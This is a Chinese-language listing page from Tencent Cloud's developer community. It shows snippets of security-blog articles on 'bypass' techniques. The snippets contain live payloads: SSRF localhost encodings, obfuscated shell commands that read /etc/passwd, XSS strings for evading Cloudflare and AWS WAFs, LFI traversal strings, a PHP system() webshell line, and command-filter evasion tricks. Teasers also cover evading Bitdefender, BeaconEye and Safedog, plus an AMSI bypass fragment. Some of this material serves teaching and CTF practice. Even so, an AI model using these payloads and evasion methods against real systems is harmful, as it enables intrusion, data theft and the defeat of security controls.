- 综合排序
- 最热优先
- 最新优先
- 来自专栏红队蓝军
bypass Bitdefender
渗透时,可能会遇到各种各样的的杀软,但每个杀软特性不同,在绕过前,往往都需要分析,本文就Bitdefender进行分析
96240编辑于 2022-04-18 - 来自专栏Khan安全团队
SSRF Bypass
http://[::]:80 http://0.0.0.0 http://0 http://0x7f000001 http://2130706433 http://0000::1 http://0000::1:25 http://0000::1:22 http://0000::1:3128 http://2130706433 http://3232235521 http://3232235777 http://2852039166 http://0o177.0.0.1
49210编辑于 2022-05-17 - 来自专栏信安成长计划
Bypass BeaconEye
这是[信安成长计划]的第 5 篇文章 0x00 目录 0x01 BeaconEye 检测原理 0x02 Bypass 1 0x03 Bypass 2 0x04 效果图 在之前的三篇文章《Stageless Beacon 生成流程分析》《Beacon C2Profile 解析》《Beacon 上线协议分析》中,已经穿插着将 C2Profile 的全部内容介绍完了,也把 Bypass 所需要的一些内容也都穿插着提到过了 ,接下来就该说如何对其进行 Bypass 0x01 BeaconEye 检测原理 BeaconEye 是通过 yara 规则来对 Beacon 进行检测的,规则所匹配的就是 C2Profile,在 Beacon 个位置 接下来也就都对得上了,类型依次是 short、short、int、int、short,对应过去就是 1、1、2、2、1,后面的值也就都是一样对应了 所以只要能够打破这个规则结构也就可以完成 Bypass 的工作了 0x02 Bypass 1 如果单纯做打破结构的话,将中间的值进行替换就可以了,整个十六个字节,实际需要使用的也就是第一位和后面的数据,中间的一片零都是没有意义的,所以在申请这片内存的时候,
65160编辑于 2022-03-03 - 来自专栏Khan安全团队
bypass payload
十六进制和unicode混淆payload cat /etc/passwd {\c''\a""t,/e''*?/?a?s??} {\c''\a""\t,/\e''*?/\p*\d}
51320编辑于 2023-02-23 - 来自专栏Khan安全团队
bypass Payload
javascript:%ef%bb%bfalert(XSS) xss %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F xss %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd lfi ../../etc/passwd lfi <svG/x=">"/oNloaD=confirm()// xss http://⑯⑨。②⑤④。⑯⑨。②
70420编辑于 2022-05-17 - 来自专栏红队蓝军
bypass Bitdefender
渗透时,可能会遇到各种各样的的杀软,但每个杀软特性不同,在绕过前,往往都需要分析,本文就Bitdefender进行分析
47710编辑于 2022-05-17 - 来自专栏Khan安全团队
bypass payload list
→ssrf.php?url=http://127.0.0.1:22 →ssrf.php?url=http://127.0.0.1:80 →srf.php?url=http://127.0.0.1:44
50930编辑于 2022-07-13 - 来自专栏LoRexxar's Blog
gif bypass CSP?
前段时间看到了一个有趣的bypasscsp的文章,最开始是在html5sec上看到的 http://html5sec.org/#138 这里本来说的是关于link的import属性,但示例中却使用gif bypass 原文 首先是原文 http://html5sec.org/cspbypass/ 我们看到作者的标题是CSP Bypass in Chrome Canary + AngularJS 并且如果你使用了chrome 如果我们将script中的src改为test.gif.js,我们看到请求变了 我们发现刚才的报错消失了,但这样一来,如果能够在同源环境下上传一个.js后缀,那么所谓的bypass csp也就没有意义了
1.6K20编辑于 2023-02-20 - 来自专栏ChaMd5安全团队
SSTI Bypass 分析
护网杯过去不久,realworld到来之前先来研究研究SSTI的Bypass套路。 SSTI Bypass 首先来看一个护网杯的那道easypy,后台在输入{{config}}的时候出现回显,因此判断是SSTI。 ? subclasses__&re=read&init=__init__&base=__base__&class=__class__&getitem=__getitem__ 因此,借这道题目来进行一下SSTI Bypass awesome-python-sandbox-in-ciscn.html https://xz.aliyun.com/t/52#toc-0 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2
1.9K50发布于 2019-10-14 - 来自专栏Khan安全团队
Cloudflare bypass WAF
"-alert(0)-" : blocked "-top['al\x65rt']('sailay')-" : passed
2.7K80编辑于 2022-04-02 - 来自专栏中国白客联盟
Phpshell Bypass Safedog
(php的function介绍可以看这里:http://www.php.net/manual/zh/functions.user-defined.php)
60530发布于 2018-10-08 - 来自专栏Khan安全团队
Incapsula bypass WAF
<?php system("uname -a"); ?>
2.3K40编辑于 2022-04-02 - 来自专栏Khan安全团队
Bypass Shellcode - Encryptor
将可执行文件注入远程 PowerShell 进程: # AMSI bypass $a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name ); } static void Shellcode() { // attempt heuristics/behaviour bypass
84160编辑于 2021-12-29 - 来自专栏Khan安全团队
AWS WAF bypass
x="=='='onmouseover=confirm`xss` style="display:block;width:1000px;height:1000px;background:red">
1.5K30编辑于 2023-02-23 - 来自专栏pankas的技术分享
命令执行bypass
命令执行漏洞绕过 过滤空格IFS9 、 一句话执行多个命令 cd ..&&cd ..&&cd ..&&cat flag cd ..;cd ..;cd ..;cat flag || 执行或语句, 也可用作连接 利用换行 如有语句 C 语言中 system() 可以用 \n 换行来执行多条命令 关键字过滤 拼接绕过 执行ls命令:a=l;b=s;ab cat /flag文件内容:a=c;b=at;c=/f;d=lag;ab {c}{d} cat /flag文件内容a="ccaatt";b={a:4:1};b
1.3K10编辑于 2022-09-28 - 来自专栏Khan安全团队
Bypass 重定向
http 参数可能包含 URL 值,并可能导致 Web 应用程序将请求重定向到指定的 URL。通过将 URL 值修改为恶意站点,攻击者可能会成功发起网络钓鱼诈骗并窃取用户凭据。由于修改后的链接中的服务器名称与原始站点相同,因此网络钓鱼尝试具有更可信的外观。
2K10编辑于 2022-01-10 - 来自专栏中国白客联盟
Phpshell Bypass Safedog(二)
上篇文章(点击即可访问)里面提到了在菜刀层面和代码层面做了相关的加密解密,那有些同学就说了,我不想做加密,我就想用原生态的、最普通的eval菜刀马行不行,当然行!
49030发布于 2018-10-23 - 来自专栏重生信息安全
「翻译」 如何Bypass rbash
它常出现在许多CTF挑战中,并且我们将基于多种方法学习如何bypass rbash。 manpages.ubuntu.com/manpages/cosmic/man1/rbash.1.html 原文:https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell
1.6K10发布于 2020-10-26 - 来自专栏Khan安全团队
Cloudflare XSS WAF Bypass
Payload: "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
85740编辑于 2022-01-27 - 来自专栏H&M的专栏
bypass disable function学习
bypass open_basedir 因为有时需要根据题目判断采用哪种bypass方式,同时,能够列目录对于下一步测试有不小帮助,这里列举几种比较常见的bypass方式,均从p神博客摘出,推荐阅读p神博客原文 简单来说就是建立软链达成bypass。 代码实现如下: <? > 将exp上传后即可执行系统命令bypass disable,就不做过多赘述。 下面看看在php中如何配合利用达成bypass disable。 ,那么这里同样可以修改extension为我们编写的so库来执行系统命令,具体利用有师傅已经写了利用脚本,事实上蚁剑中的插件已经能实现了该bypass的功能了,那么下面我直接对蚁剑中插件如何实现bypass
2.5K40编辑于 2022-08-10
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号